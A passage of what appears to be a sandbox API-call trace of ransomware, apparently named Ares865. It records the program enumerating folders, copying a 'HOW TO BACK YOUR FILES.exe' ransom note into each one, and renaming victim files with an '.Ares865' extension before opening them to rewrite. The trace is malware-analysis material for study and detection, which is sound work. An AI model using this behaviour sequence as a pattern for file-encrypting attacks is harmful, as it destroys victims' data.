[0149.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0149.034] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0149.034] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x53688880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53688880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0149.034] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0149.034] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0149.034] lstrcpyW (in: lpString1=0x2cce47a, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0149.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0149.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x86) returned 0x2e95b0 [0149.034] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0149.034] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53688880, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x53688880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0149.034] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0149.034] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53688880, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x53688880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0149.034] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0149.034] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7af0 [0149.034] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US" [0149.034] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0149.034] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0149.034] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US") returned 66 [0149.034] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US" [0149.034] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0149.034] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\triedit\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0149.035] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0149.036] GetLastError () returned 0x0 [0149.036] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0149.036] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0149.036] CloseHandle (hObject=0x120) returned 1 [0149.036] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0149.036] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0149.036] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x53688880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53688880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0149.036] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0149.036] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0149.036] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv" [0149.036] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0149.037] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0149.037] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv") returned 61 [0149.037] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv" [0149.037] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0149.037] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0149.037] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0149.038] GetLastError () returned 0x0 [0149.038] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0149.038] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0149.038] CloseHandle (hObject=0x120) returned 1 [0149.038] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0149.038] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0149.038] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x53688880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53688880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0149.038] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0149.038] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0149.039] lstrcpyW (in: lpString1=0x2cce47c, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0149.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0149.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e95b0 [0149.039] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0149.039] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53688880, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x53688880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0149.039] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0149.039] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6e32460, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x536ae9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536ae9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WksConv", cAlternateFileName="")) returned 1 [0149.039] lstrcmpiW (lpString1="WksConv", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0149.039] lstrcmpiW (lpString1="WksConv", lpString2="aoldtz.exe") returned 1 [0149.039] lstrcpyW (in: lpString1=0x2cce47c, lpString2="WksConv" | out: lpString1="WksConv") returned="WksConv" [0149.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0149.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8c) returned 0x336fc8 [0149.039] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0149.039] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6e32460, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x536ae9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536ae9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WksConv", cAlternateFileName="")) returned 0 [0149.039] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0149.039] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7af0 [0149.039] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv" [0149.039] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fc8 | out: hHeap=0x2b0000) returned 1 [0149.039] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0149.039] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv") returned 69 [0149.039] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv" [0149.039] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0149.039] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wksconv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0149.040] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0149.041] GetLastError () returned 0x0 [0149.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0149.041] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0149.041] CloseHandle (hObject=0x120) returned 1 [0149.041] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0149.041] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0149.041] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6e32460, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x536ae9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536ae9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0149.041] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0149.041] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0149.041] lstrcpyW (in: lpString1=0x2cce48c, lpString2="Wkconv.exe" | out: lpString1="Wkconv.exe") returned="Wkconv.exe" [0149.041] lstrlenW (lpString="Wkconv.exe") returned 10 [0149.041] lstrlenW (lpString="Ares865") returned 7 [0149.041] lstrcmpiW (lpString1="onv.exe", lpString2="Ares865") returned 1 [0149.042] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\Wkconv.exe.Ares865") returned 88 [0149.042] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\Wkconv.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wksconv\\wkconv.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\Wkconv.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wksconv\\wkconv.exe.ares865"), dwFlags=0x1) returned 1 [0149.044] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\Wkconv.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wksconv\\wkconv.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.044] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1199008) returned 1 [0149.044] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.044] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.044] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0149.106] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US" [0149.106] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0149.106] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0149.106] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US") returned 67 [0149.106] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US" [0149.106] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0149.106] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0149.107] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0149.108] GetLastError () returned 0x0 [0149.108] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0149.108] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0149.108] CloseHandle (hObject=0x120) returned 1 [0149.108] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0149.108] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0149.108] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x536ae9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536ae9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0149.108] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0149.108] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0149.109] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery" [0149.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0149.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0149.109] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery") returned 63 [0149.109] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery" [0149.109] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0149.109] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 0 [0149.110] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0149.110] GetLastError () returned 0x0 [0149.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0149.110] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0149.110] CloseHandle (hObject=0x120) returned 1 [0149.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0149.110] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0149.111] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x536d4b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536d4b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0149.111] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0149.111] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0149.111] lstrcpyW (in: lpString1=0x2cce480, lpString2="Bears.htm" | out: lpString1="Bears.htm") returned="Bears.htm" [0149.111] lstrlenW (lpString="Bears.htm") returned 9 [0149.111] lstrlenW (lpString="Ares865") returned 7 [0149.111] lstrcmpiW (lpString1="ars.htm", lpString2="Ares865") returned 1 [0149.111] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.htm.Ares865") returned 81 [0149.111] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\bears.htm"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.htm.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\bears.htm.ares865"), dwFlags=0x1) returned 1 [0149.114] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.htm.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\bears.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.114] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=255) returned 1 [0149.114] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.114] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.114] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.117] lstrcpyW (in: lpString1=0x2cce480, lpString2="Bears.jpg" | out: lpString1="Bears.jpg") returned="Bears.jpg" [0149.117] lstrlenW (lpString="Bears.jpg") returned 9 [0149.117] lstrlenW (lpString="Ares865") returned 7 [0149.117] lstrcmpiW (lpString1="ars.jpg", lpString2="Ares865") returned 1 [0149.118] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.jpg.Ares865") returned 81 [0149.118] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\bears.jpg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.jpg.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\bears.jpg.ares865"), dwFlags=0x1) returned 1 [0149.119] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.jpg.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\bears.jpg.ares865"), dwDesiredAccess=0xc00e0000, 